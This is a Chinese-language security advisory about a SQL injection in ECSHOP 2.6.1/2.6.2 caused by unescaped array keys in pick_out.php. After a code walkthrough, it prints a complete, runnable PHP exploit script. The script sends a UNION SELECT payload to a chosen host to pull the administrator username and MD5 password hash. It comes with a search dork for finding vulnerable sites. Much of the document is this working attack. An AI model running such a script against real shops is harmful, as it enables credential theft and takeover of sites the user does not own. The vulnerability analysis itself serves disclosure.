影响版本:
ECSHOP 2.6.1/2.6.2
程序介绍:
ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。
漏洞分析:
文件includes/init.php判断get_magic_quotes_gpc(),如果为off则调用addslashes_deep():
- // includes/init.php
- if (!get_magic_quotes_gpc())
- {
- if (!emptyempty($_GET))
- {
- $_GET = addslashes_deep($_GET);
- }
- if (!emptyempty($_POST))
- {
- $_POST = addslashes_deep($_POST);
- }
- $_COOKIE = addslashes_deep($_COOKIE);
- $_REQUEST = addslashes_deep($_REQUEST);
- }
addslashes_deep()在文件includes/lib_base.php里最后通过addslashes()处理
- // includes/lib_base.php
- function addslashes_deep($value)
- {
- if (emptyempty($value))
- {
- return $value;
- }
- else
- {
- return is_array($value) ? array_map(‘addslashes_deep’, $value) : addslashes($value);
- // 只处理了数组的值:)
- }
- }
下面看下具体的导致漏洞的代码,文件 pick_out.php里:
- // pick_out.php
- if (!emptyempty($_GET[‘attr’]))
- {
- foreach($_GET[‘attr’] as $key => $value)
- {
- $key = intval($key);
- $_GET[‘attr’][$key] = htmlspecialchars($value);
- // foreach处理的是指定数组的拷贝,所以这里的处理并不影响数组原先的key和value
- // 因此可以引入任意的key:)
- // 程序员的逻辑出了问题?
- }
- }
- …
- foreach ($_GET[‘attr’] AS $key => $value)
- {
- $attr_url .= ‘&attr[‘ . $key . ‘]=’ . $value;
- $attr_picks[] = $key;
- if ($i > 0)
- {
- if (emptyempty($goods_result))
- {
- break;
- }
- // 利用key进行注射:)
- $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE goods_id IN (" . implode(‘,’ , $goods_result) . ") AND attr_id=’$key’ AND attr_value=’$value’");
由于magic_quotes_gpc=off时没有对$key处理,同时在数组赋值时存在逻辑问题,最终导致了注射漏洞.
漏洞利用:
- #!/usr/bin/php
- <?php
- //本程序只作技术交流,请不要用做非法用途!!
- print_r(‘
- +—————————————————————————+
- ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
- by puret_t
- mail: puretot at gmail dot com
- team: http://bbs.wolvez.org
- dork: "Powered by ECShop"
- +—————————————————————————+
- ‘);
- /**
- * works with magic_quotes_gpc = Off
- */
- if ($argc < 3) {
- print_r(‘
- +—————————————————————————+
- Usage: php ‘.$argv[0].’ host path
- host: target server (ip/hostname)
- path: path to ecshop
- Example:
- php ‘.$argv[0].’ localhost /ecshop/
- +—————————————————————————+
- ‘);
- exit;
- }
- error_reporting(7);
- ini_set(‘max_execution_time’, 0);
- $host = $argv[1];
- $path = $argv[2];
- $resp = send();
- preg_match(‘#IN\s\(([\S]+):([a-z0-9]{32})\)#’, $resp, $hash);
- if ($hash)
- exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
- else
- exit("Exploit Failed!\n");
- function send()
- {
- global $host, $path;
- $cmd = ‘cat_id=999999&attr[%27%20UNION%20SELECT%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20WHERE%20action_list%3d%27all%27%20LIMIT%201%23]=ryat’;
- $data = "GET ".$path."pick_out.php?".$cmd." HTTP/1.1\r\n";
- $data .= "Host: $host\r\n";
- $data .= "Connection: Close\r\n\r\n";
- $fp = fsockopen($host, 80);
- fputs($fp, $data);
- $resp = ”;
- while ($fp && !feof($fp))
- $resp .= fread($fp, 1024);
- return $resp;
- }
- ?>
解决方案:
厂商补丁
ECSHOP
———-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ecshop.com
信息来源:
<*来源: ryat#www.wolvez.org
链接: http://www.80vul.com
*>
0 条评论。